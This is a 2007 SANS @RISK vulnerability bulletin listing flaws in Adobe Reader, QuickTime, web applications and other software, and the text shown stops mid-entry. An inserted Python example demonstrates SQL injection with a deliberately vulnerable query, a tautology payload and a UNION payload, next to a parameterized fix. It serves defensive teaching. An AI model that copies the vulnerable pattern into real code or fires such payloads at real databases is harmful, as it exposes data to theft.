@RISK: The Consensus Security Vulnerability Alert

Volume: VI, Issue: 41
October 8, 2007

This week's top vulnerability is from Adobe and affects Windows XP and IE 7 users. See number 1 below. Apple QuickTime for Windows also needs to be patched.

There is finally some good news on the quest to reduce the number of security flaws in software. If we are ever going to turn the tide against the attackers, we have to find a way to deploy more secure code. Only programmers who know how to write secure code can make that happen. The good news is that 23 programmers (out of 42 pioneers who took the first exam) passed the GSSP exams in Secure Coding in Java and Secure Coding in C. Cisco is in the lead among software and hardware companies with three people passing the first exams. Other companies with new GSSP certified programmers include Kaiser Permanente, Siemens, Telus and more. The names and organizations of people who passed are listed in the last story of this issue.

Momentum on the GSSP has begun. One large US company has told all its 6,500 programmers and outsourced coders that they have until next summer to pass the secure coding exam or they will not be allowed to touch the code. And one of the three largest software companies in the world just sent letters to the ten colleges that supply the most programmers telling them that job candidates should consider demonstrating secure coding skills through the GSSP.

Alan

P.S. For a schedule of times and places where programmers can take the exam: http://www.sans.org/gssp/

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

Platform                                  Number of Updates and Vulnerabilities
------------------------                  -------------------------------------
Other Microsoft Products                  1
Third Party Windows Apps                  7 (#1, #3, #6)
Linux                                     2
Solaris                                   1 (#4)
Unix                                      1
Cross Platform                            16 (#2, #5)
Web Application - Cross Site Scripting    11
Web Application - SQL Injection           9
Web Application                           22
Network Device                            11

************************* Sponsored By Sunbelt Software ********************

Is Your Network Protected Against Blended Malware Threats?

CounterSpy Enterprise gives you protection against malware using a new hybrid technology that merges the 'system cleaning' properties of traditional antispyware products with the efficiency of powerful antivirus-based technology.

Find out how many machines on your network are infected! Download the free trial now!

http://www.sans.org/info/17426

****************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Other Microsoft Products
Third Party Windows Apps
Linux
Solaris
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

******************************Sponsored Link: ******************************

1) Learn to select and implement the right tools at the Data Leakage and Insider Threat Summit December 3-4. http://www.sans.org/info/17431

2) Where can you find Hacker Exploits, Security Essentials, Forensics, Wireless, Auditing, CISSP, and SANS' other top-rated courses?

- Washington DC (12/13-12/18): http://www.sans.org/cdi07
- New Orleans (1/12-1/17): http://www.sans.org/security08/event.php
- London (11/26-12/1): http://www.sans.org/london07/
- Chicago (11/2-11/7): http://www.sans.org/chicago07/event.php
- Tokyo (11/5-11/10): http://www.sans.org/sanstokyo2007_autumn/event.php

****************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) CRITICAL: Adobe PDF Viewer Remote Code Execution
  • Affected:
    • Adobe Reader versions 8.1 and prior
    • Adobe Acrobat versions 8.1 and prior
    • Adobe Acrobat Elements versions 8.1 and prior
    • Adobe Acrobat 3D
  • Description: Adobe has disclosed information related to a remote code execution vulnerability in its Portable Document Format (PDF) viewing applications that was discussed in an earlier edition of @RISK. A specially crafted PDF file could trigger this vulnerability to execute arbitrary code when the file is viewed. Only systems running Microsoft Windows XP and Microsoft Internet Explorer 7 are vulnerable. Microsoft Windows Vista is not affected. The flaw relates to a failure to properly handle URLs included in PDF files. Some technical details for this vulnerability are publicly available, and a proof-of-concept is believed to be available in the wild.

  • Status: Adobe confirmed, no updates available. A workaround is available in Adobe's advisory.

  • References:

  • (3) HIGH: Apple QuickTime Arbitrary Script Injection Vulnerability
  • Affected:
    • Apple QuickTime for Windows versions 7.2 and prior
  • Description: QuickTime is Apple's streaming media framework, and is available for Apple Mac OS X and Microsoft Windows. The Microsoft Windows version contains a flaw in its handling of URLs. A specially crafted QuickTime Link (QTL) file containing a URL could trigger this vulnerability and allow an attacker to execute arbitrary script code with the privileges of the current user. This issue may be related to an issue discussed in a previous @RISK. Note that this issue only affects QuickTime when installed on Microsoft Windows; QuickTime on Apple Mac OS X is not affected.

  • Status: Apple confirmed, updates available.

  • References:

  • (4) MODERATE: X.org/Sun X Font Server Multiple Vulnerabilities
  • Affected:
    • X.org X Font Server versions 1.0.4 and prior
  • Description: The X Font Server is used by the X Window System to serve fonts to remote clients for display. The X.org reference implementation of this software is considered to be the standard implementation and is the most widely deployed version. It is installed by default on numerous Unix, Unix-like, and Linux operating systems. It contains multiple memory corruption vulnerabilities. A specially crafted request to the server could exploit one of these vulnerabilities and allow an attacker to execute arbitrary code with the privileges of the vulnerable process. While the vulnerable software is installed on a wide selection of operating systems, Sun's Solaris is the only major operating system known to expose the vulnerable software remotely. Technical details for this vulnerability are available via source code analysis. Other X implementations, such as XFree86, may also be vulnerable, but currently only the X.org implementation included with Sun Solaris is known to be remotely vulnerable.

  • Status: X.org confirmed, updates available. Users can mitigate the impact of this vulnerability by blocking access to TCP port 7100 at the network perimeter, if possible.

  • References:

Other Software
  • (6) HIGH: Altnet Download Manager ActiveX Control Buffer Overflow
  • Affected:
    • Altnet Download Manager versions 4.x
    • Kazaa versions 3.x and prior
    • Grokster
  • Description: The Altnet Download Manager is a popular download management application. Its functionality is exposed via an ActiveX control, and this control contains a buffer overflow in its "Install" method. A specially crafted web page that instantiates this control could exploit this buffer overflow to execute arbitrary code with the privileges of the current user. Some technical details for this vulnerability are publicly available. Note that this ActiveX control is included in the Kazaa and Grokster applications.

  • Status: Vendor has not confirmed, no updates available. Users can mitigate the impact of this vulnerability by disabling the control via Microsoft's "kill bit" mechanism.

  • References:

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 41, 2007

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5549 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 07.41.1 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft October 2007 Advance Notification Multiple Vulnerabilities
  • Description: Microsoft has provided advance notification of seven security bulletins to be released on October 9, 2007. The highest severity rating for these issues is "Critical". Please refer to the link below for further details.
  • Ref: http://www.microsoft.com/technet/security/bulletin/rating.mspx

  • 07.41.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: CyberLink PowerDVD CLAVSetting.DLL Arbitrary File Overwrite
  • Description: CyberLink PowerDVD is a DVD playback application. The ActiveX control is exposed to an arbitrary file overwrite issue because it fails to properly sanitize user-supplied input.
  • Ref: http://support.microsoft.com/kb/240797

  • 07.41.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: EDraw Office Viewer Component FtpDownloadFile ActiveX Buffer Overflow
  • Description: The EDraw Office Viewer Component is an ActiveX control to display and interact with Microsoft Office files such as Word, Excel, PowerPoint, Project and Visio. The application is exposed to buffer overflow issues because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. EDraw Office Viewer Component version 5.3 is affected.
  • Ref: http://support.microsoft.com/kb/240797

  • 07.41.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: CenterTools DriveLock Remote Buffer Overflow
  • Description: DriveLock is an application that facilitates device control and data security for mobile and portable devices that may be introduced into a network. It is available for Windows operating systems. The application is exposed to a buffer overflow issue because it fails to adequately bounds check user-supplied data before copying it to an insufficiently sized buffer. DriveLock and DriveLock Security Reporting Center versions 5.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/25902

  • 07.41.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Altnet Download Manager ADM4 ActiveX Buffer Overflow
  • Description: Altnet is a peer-to-peer distributor of licensed digital entertainment and file sharing applications. Altnet customers can use file sharing utilities such as KaZaA and Grokster to download media files. The application is exposed to a buffer overflow issue because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. Altnet Download Manager version 4.0 is affected.
  • Ref: http://support.microsoft.com/kb/240797

  • 07.41.6 - CVE: CVE-2007-4673
  • Platform: Third Party Windows Apps
  • Title: Apple QuickTime for Windows Remote Code Execution
  • Description: QuickTime Player is the media player distributed by Apple for QuickTime and other media files. The application is exposed to a remote code execution issue due to a failure of the application to securely handle URIs. QuickTime version 7.2 running on the Microsoft Windows Vista or XP SP2 platforms is affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306560

  • 07.41.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Vba32 Personal Antivirus Insecure File Permissions Local Privilege Escalation
  • Description: VirusBlokAda Vba32 Personal is an antivirus application for the Microsoft Windows operating system. The application is exposed to a local privilege escalation issue that stems from a design error. Vba32 Personal version 3.12.2 is affected.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066313.html

  • 07.41.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ConeXware PowerArchiver BlackHole Archive Handling Buffer Overflow
  • Description: PowerArchiver is a file compression/decompression tool for the Microsoft Windows operating system. The application is exposed to a buffer overflow issue when handling specially-crafted BlackHole archives. This issue arises because PowerArchiver fails to perform boundary checks on user-supplied data. PowerArchiver versions prior to 10.20.21 are affected.
  • Ref: http://www.securityfocus.com/bid/25938

  • 07.41.9 - CVE: Not Available
  • Platform: Linux
  • Title: rPath rMake Local Privilege Escalation
  • Description: rPath Linux is a specialized GNU/Linux distribution for the enterprise. The application is exposed to a local privilege escalation issue that stems from a design error. rMake version 1.0.11 is affected.
  • Ref: https://issues.rpath.com/browse/RMK-634

  • 07.41.10 - CVE: CVE-2007-4133
  • Platform: Linux
  • Title: Linux Kernel HugeTLB Local Denial of Service
  • Description: The Linux Kernel is exposed to a local denial of service issue due to a design error in the "hugetlbfs" handling procedures. Linux kernel 2.6.x versions prior to 2.6.18 are affected.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.18

  • 07.41.11 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris I_PEEK IOCTL Handler Local Information Disclosure
  • Description: Sun Solaris is an enterprise-level UNIX distribution. The application is exposed to a local information disclosure issue because it fails to adequately sanitize user-supplied input.
  • Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=603

  • 07.41.12 - CVE: Not Available
  • Platform: Unix
  • Title: SmbFTPD SMBDirList Format String
  • Description: SmbFTPD is an FTP server for BSD and UNIX platforms. The application is exposed to a format string issue that presents itself because the application fails to properly sanitize filenames that contain format specifiers. SmbFTPD versions prior to 0.97 are affected.
  • Ref: http://www.securityfocus.com/archive/1/481220

  • 07.41.13 - CVE: CVE-2007-5162
  • Platform: Cross Platform
  • Title: Ruby Net::HTTP SSL Insecure Certificate Validation Weakness
  • Description: Ruby's Net::HTTP is a library that implements functionality to perform HTTP and HTTPS network requests. It is included with the core Ruby package. The application is exposed to an insecure-certificate-validation weakness because the library fails to properly perform validity checks on X.509 certificates.
  • Ref: http://www.securityfocus.com/archive/1/480987

  • 07.41.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Fire X2100 M2 And X2200 M2 ELOM Unauthorized Access
  • Description: Sun Fire X2100 M2 and X2200 M2 are enterprise level servers. They use the Embedded Lights Out Manager (ELOM) for remote management purposes. The servers are exposed to an issue affecting the ELOM. This issue allows unprivileged users to initiate unauthorized network traffic from the server process.
  • Ref: http://sunsolve.sun.com/show.do?target=tous

  • 07.41.15 - CVE: CVE-2007-4996
  • Platform: Cross Platform
  • Title: Pidgin MSN Nudge Messages Remote Denial of Service
  • Description: Pidgin is a chat client available for multiple operating systems. It was formerly known as Gaim. The application is exposed to a remote denial of service issue. This issue occurs when handling MSN "Nudge" messages sent by users who are not on the recipient's buddy list. Pidgin versions prior to 2.2.1 are affected.
  • Ref: http://www.pidgin.im/news/security/?id=23

  • 07.41.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: FSD Exechelp And Execmulticast Multiple Remote Buffer Overflow Vulnerabilities
  • Description: FSD is a flight simulator server available for Microsoft Windows, Unix and other Unix-like operating systems. The application is exposed to multiple remote buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data. FSD versions 2.052 d9 and 3.0000 d9 are affected.
  • Ref: http://www.securityfocus.com/archive/1/481221

  • 07.41.17 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Check Point SecurePlatform Multiple Buffer Overflow Vulnerabilities
  • Description: Check Point SecurePlatform is a server operating system with built-in security. Applications that use the Check Point SecurePlatform are exposed to multiple buffer overflow issues because the platform fails to perform adequate boundary checks on user-supplied data. SecurePlatform R60 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481219

  • 07.41.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: id Software Doom 3 Engine Console String Visualization Format String Vulnerability
  • Description: The Doom 3 engine is the underlying engine used for several video games developed by id Software. PunkBuster is an anti-cheating program commonly used on public game servers. The application is exposed to a format string issue that affects a "printf()"-type function that is used during the visualization of strings in the engine's command console.
  • Ref: http://www.securityfocus.com/archive/1/481229

  • 07.41.19 - CVE: CVE-2007-4568
  • Platform: Cross Platform
  • Title: X.Org X Font Server Multiple Memory Corruption Vulnerabilities
  • Description: X.Org X Font Server (XFS) is used to render fonts for the X servers. The application is exposed to multiple memory corruption issues. X Font Server version 1.0.4 is affected.
  • Ref: http://lists.freedesktop.org/archives/xorg-announce/2007-October/000416.html

  • 07.41.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Borland InterBase Multiple Remote Buffer Overflow Vulnerabilities
  • Description: Borland InterBase is a scalable database application available for multiple operating platforms including Windows, Linux, and Solaris. The application is exposed to multiple remote buffer overflow issues because it fails to bounds check user-supplied input before copying it into an insufficiently sized memory buffer. Firebird versions 1.5.3, 1.5.4, 2.0.0, and 2.0.1 for Linux and Windows are affected.
  • Ref: http://risesecurity.org/advisory/RISE-2007002/

  • 07.41.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Multiple Weaknesses
  • Description: The Java Runtime Environment is an application that allows users to run Java applications. The application is exposed to multiple weaknesses. These issues affect the following packages for Windows, Solaris and Linux:
    • JDK and JRE 6 Update 2 and earlier
    • JDK and JRE 5.0 Update 12 and earlier
    • SDK and JRE 1.4.2_15 and earlier
    • SDK and JRE 1.3.1_20 and earlier
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103071-1&searchclause=

  • 07.41.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java WebStart Multiple File Access And Information Disclosure Vulnerabilities
  • Description: Sun Java Web Start is a utility included in the Java Runtime Environment. It enables Java applications to launch from a desktop or from a web page. The application is exposed to multiple remote issues. These issues affect the following packages:
    • JDK and JRE 6 Update 2 and earlier
    • JDK and JRE 5.0 Update 12 and earlier
    • SDK and JRE 1.4.2_15 and earlier
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103073-1&searchclause=

  • 07.41.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Firebird Relational Database Multiple Remote Stack Buffer Overflow Vulnerabilities
  • Description: Firebird is a Relational Database Management System (RDBMS) available for multiple operating systems. The application is exposed to multiple remote stack-based buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data.
  • Ref: http://www.risesecurity.org/advisory/RISE-2007003/

  • 07.41.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NetSupport Manager Initial Client Connection Buffer Overflow
  • Description: NetSupport Manager is a commercially available remote control and management application available for multiple platforms. The application is exposed to a buffer overflow issue because the client listening on TCP port 5405 does not adequately bounds check user-supplied input during the initial handshake process.
  • Ref: http://www.securityfocus.com/archive/1/481537

  • 07.41.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Cosminexus JSSE SSL/TLS Handshake Request Handling Denial of Service
  • Description: Hitachi Cosminexus is an application server available for multiple operating platforms. The application is exposed to a remote denial of service issue because the application fails to handle invalid SSL/TLS handshake requests. JSSE is an extended component of Cosminexus Developer's Kit for Java(TM).
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-031_e/index-e.html

  • 07.41.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi TPBroker Object Transaction Monitor Remote Denial of Service
  • Description: Hitachi TPBroker is a compliant-transaction manager based on CORBA and the Object Transaction Service (OTS). The application is exposed to a remote denial of service issue because it fails to handle invalid messages. Refer to the link below for further information.
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-032_e/index-e.html

  • 07.41.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Cosminexus Agent Remote Denial of Service
  • Description: Hitachi Cosminexus is an application server available for multiple operating platforms. The application is exposed to a remote denial of service issue because it fails to handle invalid data sent by a process other than Cosminexus Manager. Hitachi Cosminexus versions 03-00 to 03-05 on Windows, HP-UX and Solaris are affected.
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-033_e/index-e.html

  • 07.41.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: OpenVMS Multiple Denial of Service Vulnerabilities
  • Description: OpenVMS is a mainframe-like operating system originally developed by Digital. It is maintained and distributed by HP. The application is exposed to multiple local denial of service issues. OpenVMS ALPHA version 8.3 and OpenVMS for Integrity Servers version 8.3 are affected.
  • Ref: http://www.securityfocus.com/bid/25939

  • 07.41.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GroupLink eHelpDesk Multiple Cross-Site Scripting Vulnerabilities
  • Description: GroupLink's eHelpDesk (everything HelpDesk) is a web-based application implemented in JSP. The application is exposed to multiple cross-site scripting issues because it fails to sanitize the "username" and "LDAPError" input parameters in the "index2.jsp" script, and the "NA_DISPLAYNAME" input parameter in the "helpdesk/user/rf_create.jsp" script. eHelpDesk version 6.2.2 is affected.
  • Ref: http://www.securityfocus.com/bid/25870

  • 07.41.30 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: eGov Manager Multiple Cross-Site Scripting Vulnerabilities
  • Description: eGov Manager is a content manager designed for government sites. The application is exposed to multiple cross-site scripting issues because it fails to sanitize user-supplied input to the "center.exe" and "Index.exe" executables.
  • Ref: http://www.securityfocus.com/archive/1/481210

  • 07.41.31 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: OdysseySuite Mailbox.MWS Cross-Site Scripting
  • Description: OdysseySuite is a web-based banking application. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "idkey" parameter of the "Mailbox.mws" script. OdysseySuite version 4.0.729 is affected.
  • Ref: http://pridels-team.blogspot.com/2007/10/odysseysuite-internet-banking-vuln.html

  • 07.41.32 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Google Mini Search Appliance IE Parameter Cross-Site Scripting
  • Description: Google Mini Search Appliance is an integrated hardware and software enterprise search solution. The application is exposed to a cross-site scripting issue because it fails to sanitize the "ie" input parameter in the "search" script. Google Mini Search Appliance version 3.4.14 is affected.
  • Ref: http://www.securityfocus.com/bid/25894

  • 07.41.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Arbor Networks Peakflow SP Unspecified Multiple Cross-Site Scripting Vulnerabilities
  • Description: Peakflow SP is a network management appliance targeted to network service providers. The application is exposed to multiple cross-site scripting issues because it fails to properly sanitize user-supplied input. These issues affect multiple unspecified parameters used in HTTP "GET" and "POST" requests. Peakflow SP versions 3.5.1 and 3.6.1 are affected.
  • Ref: http://www.securityfocus.com/bid/25907

  • 07.41.34 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: UebiMiau Index.PHP Cross-Site Scripting
  • Description: UebiMiau is a web-based email client. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input to the "f_email" parameter of the "index.php" script.
  • Ref: http://www.securityfocus.com/bid/25912

  • 07.41.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DRBGuestbook Index.PHP Cross-Site Scripting
  • Description: DRBGuestbook is a web-based guestbook application. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. Specifically, this issue affects the "action" parameter of the "index.php" script. DRBGuestbook version 1.1.13 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481417

  • 07.41.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Google FeedBurner FeedSmith Cross-Site Request Forgery
  • Description: FeedBurner FeedSmith is a plugin tool for web content publishers to manage RSS and other feeds. The application is exposed to a cross-site request-forgery issue. FeedBurner FeedSmith version 2.2 is affected.
  • Ref: http://blogs.feedburner.com/feedburner/archives/2007/10/the_feedsmith_plugin_newly_for.php

  • 07.41.37 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: GForge Verify.PHP Cross-Site Scripting
  • Description: GForge is an application for managing source code. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input to the "confirm_hash" parameter of the "account/verify.php" script. GForge version 4.6 is affected.
  • Ref: http://gforge.org/tracker/?func=detail&atid=105&aid=3094&group_id=1

  • 07.41.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: AppFuse Messages.JSP Cross-Site Scripting
  • Description: AppFuse is a Java-based tool for creating applications. AppFuse is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. Specifically, this issue affects the "out_value" parameter of the "addError()" function used in the "messages.jsp" script, which will accept a user-supplied script as an input parameter. AppFuse version 2.0-RC1 is affected.
  • Ref: http://issues.appfuse.org/browse/APF-880

  • 07.41.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Stuffed Guys Stuffed Tracker Multiple Cross-Site Scripting Vulnerabilities
  • Description: Stuffed Tracker is an application that allows users to monitor and analyze web traffic. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. Specifically, these issues affect the following scripts and parameters: campaign_link.html: GLink and actions.html: EditId.
  • Ref: http://www.securityfocus.com/archive/1/481530

  • 07.41.40 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: MD-Pro Index.PHP Firefox ID SQL Injection
  • Description: MD-Pro is a content management system (CMS). MD-Pro is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "Firefox ID" parameter of the "index.php" script before using it in an SQL query. MD-Pro version 1.0.76 is affected.
  • Ref: http://www.securityfocus.com/bid/25864

  • 07.41.41 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: MambAds Mambo Component CAID Parameter SQL Injection
  • Description: MambAds is a component for the Mambo content management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "caid" parameter before using it in an SQL query. MambAds version 1.5 is affected.
  • Ref: http://www.securityfocus.com/bid/25865

  • 07.41.42 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Expanded Calendar PHP-Fusion Module Show_Single.PHP SQL Injection
  • Description: PHP-Fusion is a content management system (CMS). The Expanded Calendar module for PHP-Fusion is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "sel" parameter of the "infusions/calendar_events_panel/show_single.php" script before using it in an SQL query. Expanded Calendar version 2.01 is affected.
  • Ref: http://www.securityfocus.com/bid/25876

  • 07.41.43 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ASP Product Catalog Default.ASP SQL Injection
  • Description: ASP Product Catalog is a web-based database driven product catalog. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cid" parameter of the "default.php" script before using it in an SQL query. ASP Product Catalog version 1.0 Beta 1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481211

  • 07.41.44 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: X-script Guestbook mes_add.php Multiple SQL Injection Vulnerabilities
  • Description: X-script Guestbook is a web-based guestbook application. The application is exposed to multiple SQL injection issues because it fails to properly sanitize user-supplied input to the following parameters of "med_add.php" before using it in SQL queries: name, email, icq, website. X-script Guestbook version 1.3a is affected.
  • Ref: http://www.securityfocus.com/archive/1/481209

  • 07.41.45 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Ohesa Emlak Portal Multiple SQL Injection Vulnerabilities
  • Description: Ohesa Emlak Portal is a real estate portal. The Portal is exposed to multiple SQL injection issues because it fails to adequately sanitize user-supplied inputs before using them in an SQL query. Ohesa Emlak Portal version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25880

  • 07.41.46 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: iScripts MultiCart Multiple SQL Injection Vulnerabilities
  • Description: iScripts MultiCart is a web-based ecommerce application. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "catid" parameter of "categorydetail.php" and the "ddlcategory" parameter of "search.php" before using it in SQL queries. iScripts MultiCart version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25895

  • 07.41.47 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Deonix Web Templates Management Index.PHP SQL Injection
  • Description: Web Templates Management is a web-based content management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "index.php" script before using it in an SQL query. Web Templates Management version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/25926

  • 07.41.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Furkan Tastan Blog KATEGORI.ASP SQL Injection
  • Description: Furkan Tastan Blog is a blog application implemented in ASP. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "kategori.asp" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/25934
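
Every SQL injection entry above shares one root cause: a request parameter that should be an integer identifier ("caid", "cid", "id") is concatenated into the SQL text, so the attacker's input is executed as SQL. The following is an added example, not code from the newsletter or from any product listed, showing the flawed pattern beside its fix in Python with an in-memory SQLite database. The "ads" table, its columns and its rows are constructed for the demo; the payloads are the two generic classes (tautology and UNION) that such a parameter admits, and the fix generalizes to the ASP entries as well, since every mainstream database driver offers bound parameters.

```python
"""Added example: SQL injection through an integer 'id'-style parameter.

The "ads" table and its contents are constructed sample data, not taken from
any of the affected products.
"""
import sqlite3

# Constructed sample data: ads looked up by category id ("caid").
SAMPLE_ROWS = [
    (1, 10, "public ad"),
    (2, 10, "another public ad"),
    (3, 99, "unpublished ad"),       # must never be reachable via caid=10
    (4, 42, "internal placeholder"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id INTEGER PRIMARY KEY, caid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO ads VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def ads_by_category_vulnerable(conn: sqlite3.Connection, caid: str) -> list:
    """The flawed pattern: the raw request parameter is pasted into the SQL
    text, so whatever the client sends runs with the application's database
    privileges."""
    sql = "SELECT id, title FROM ads WHERE caid = " + caid
    return conn.execute(sql).fetchall()


def ads_by_category_safe(conn: sqlite3.Connection, caid: str) -> list:
    """Hardened: enforce the expected type, then pass the value as a bound
    parameter so the driver never interprets it as SQL."""
    try:
        caid_int = int(caid)
    except ValueError:
        # Reject rather than "sanitize": a category id is an integer or it is invalid.
        return []
    sql = "SELECT id, title FROM ads WHERE caid = ?"
    return conn.execute(sql, (caid_int,)).fetchall()


def demo() -> dict:
    """Run both versions against a legitimate value and two injection payloads."""
    conn = make_db()
    legit = "10"
    # Boolean-based payload: the WHERE clause becomes always true.
    tautology = "10 OR 1=1"
    # UNION-based payload: pulls rows the query was never meant to return.
    union = "10 UNION SELECT caid, title FROM ads WHERE caid = 99"
    results = {
        "vuln_legit": ads_by_category_vulnerable(conn, legit),
        "vuln_tautology": ads_by_category_vulnerable(conn, tautology),
        "vuln_union": ads_by_category_vulnerable(conn, union),
        "safe_legit": ads_by_category_safe(conn, legit),
        "safe_tautology": ads_by_category_safe(conn, tautology),
        "safe_union": ads_by_category_safe(conn, union),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:16s} -> {rows}")
```

The vulnerable function returns all four rows for the tautology and leaks the caid=99 row for the UNION payload; the hardened function returns the two legitimate rows for "10" and nothing for either payload. Note that the fix is type enforcement plus parameter binding, not escaping: escaping quotes does nothing for a numeric context, which is exactly where these "id" parameters sit.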

  • 07.41.49 - CVE: Not Available
  • Platform: Web Application
  • Title: i-Systems Inc. Feedreader3 RSS Feed HTML Injection
  • Description: Feedreader3 is an RSS feed aggregator. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Feedreader3 version 3.10 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481208

  • 07.41.50 - CVE: Not Available
  • Platform: Web Application
  • Title: Public Media Manager newstopic_inc.php Remote File Include
  • Description: Public Media Manager is a web-based content management system. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input before using it in a PHP "include()" function call. Public Media Manager version 1.3 is affected.
  • Ref: http://pmm-cms.sourceforge.net/

  • 07.41.51 - CVE: Not Available
  • Platform: Web Application
  • Title: Zomplog admin/upload_files.php Unauthorized Access
  • Description: Zomplog is a web-based blogging application. The application is exposed to an unauthorized access issue because it fails to adequately limit access to administrative scripts. Zomplog version 3.8.1 is affected.
  • Ref: http://www.securityfocus.com/bid/25861

  • 07.41.52 - CVE: Not Available
  • Platform: Web Application
  • Title: MXBB MX Glance Module PHPBB_Root_Path Remote File Include
